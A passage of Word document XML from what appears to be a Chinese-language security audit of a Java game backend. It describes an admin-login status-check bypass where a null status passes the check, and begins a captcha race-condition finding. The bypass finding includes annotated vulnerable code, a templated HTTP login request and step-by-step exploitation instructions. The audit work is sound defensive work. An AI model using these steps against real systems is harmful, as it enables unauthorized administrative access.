        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false &amp;&amp; (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false || false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`false`，不返回 null，直接进入密码校验阶段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">开发者的意图显然是"仅 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的账号允许登录"，但实际实现允许 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的账号通过状态检查，进而在密码匹配成功后正常获得 token。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在以下场景中会出现 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的管理员账号：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>新创建但尚未激活（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段未赋初值）的账号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">通过将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段置 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来"停用"管理员的账号（而非设为 0 或 2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">历史数据迁移后 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段未填充的记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者持有上述账号的合法用户名与密码后，可绕过"账号禁用"管控，以停用或未激活的管理员身份成功登录后台。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="13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请求 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminLoginController.login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminLoginService.login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（状态检查缺陷点）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>adminTokenService.generateToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（发放有效 token）</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入口：AdminLoginController.java</w:t>
              <w:br/>
              <w:t>// LoginRequest 可控字段：</w:t>
              <w:br/>
              <w:t>//   String username        ← 攻击者可控</w:t>
              <w:br/>
              <w:t>//   String password        ← 攻击者可控（明文）</w:t>
              <w:br/>
              <w:t>//   String encryptedPassword</w:t>
              <w:br/>
              <w:t>//   String captchaKey      ← 需为有效验证码 key</w:t>
              <w:br/>
              <w:t>//   String captchaCode     ← 需为有效验证码</w:t>
              <w:br/>
              <w:t>@PostMapping("/login")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;AdminLoginVO&gt; login(@RequestBody LoginRequest req) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 验证码校验（需通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!adminCaptchaService.verify(req.getCaptchaKey(), req.getCaptchaCode())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return ApiResponse.error(400, "验证码错误或已过期");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String password = null;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getEncryptedPassword() != null &amp;&amp; !req.getEncryptedPassword().isBlank()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        password = adminRsaService.decrypt(req.getEncryptedPassword());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (password == null) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        password = req.getPassword(); // ← 攻击者传入明文密码</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String token = adminLoginService.login(username, password); // ← 污点传入 service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层漏洞点：AdminLoginService.java</w:t>
              <w:br/>
              <w:t>public String login(String username, String password) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (username == null || username.isBlank() || password == null) return null;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    AdminUser admin = adminUserRepository.findByUsername(username.trim()).orElse(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (admin == null || admin.getStatus() != null &amp;&amp; admin.getStatus() != 1) return null;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 漏洞点：当 admin.getStatus() == null 时，整个条件为 false，</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //   状态检查被绕过，停用/未激活账号可正常通过此处</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!passwordEncoder.matches(password, admin.getPasswordHash())) return null;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return adminTokenService.generateToken(admin.getId()); // ← 向停用账号颁发有效 token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/admin/login HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "username": "&lt;status_null_admin_username&gt;",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "password": "&lt;known_password_of_that_admin&gt;",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "captchaKey": "&lt;valid_captcha_key&gt;",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "captchaCode": "&lt;valid_captcha_code&gt;"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利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>访问验证码接口（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /admin/captcha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）获取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 及验证码图片，识别 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaCode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">确认目标系统中存在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的管理员账号（新建未激活账号或被"置 null 停用"的账号），获取其用户名与密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">按上述 HTTP 包发送登录请求，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为该账号的明文密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>admin.getStatus() != null &amp;&amp; admin.getStatus() != 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时，因 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getStatus()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 短路为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，整个 OR 条件为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，不触发拒绝逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>密码哈希校验通过后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>adminTokenService.generateToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 正常颁发 token，响应体中包含有效的管理员 JWT/token，登录成功</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：停用或未激活的管理员账号在凭据正确时成功获得访问 token，完全绕过账号状态管控。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">是否需要登录：否（登录接口本身为公开路径 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/admin/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">权限级别：攻击者需持有目标管理员账号的用户名与对应密码；结合内部 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 账号（如离职员工遗留账号、待审核账号）场景下，可完全绕过账号禁用管控，以停用身份获取后台管理权限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39"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminLoginController.java.login → AdminLoginService.java.login → AdminUser.java.getStatus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audit_m052_100_login_ctrl-path4of19.md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：AdminCaptchaService.java#verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_8" w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞7：验证码校验 TOCTOU 竞态条件导致验证码可被并发复用，绕过暴力破解防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="14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：管理员登录验证码 TOCTOU 竞态条件（非原子 GET+DELETE）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="14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src/main/java/com/gameBack/mjservice/service/AdminCaptchaService.java:verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="14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认证绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="14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4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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/admin/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ADMIN_PUBLIC_PATHS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 白名单中，无需任何身份凭证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="14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verify()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对 Redis 执行了两条独立的非原子命令：先 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 取出验证码值，再 </w:t>
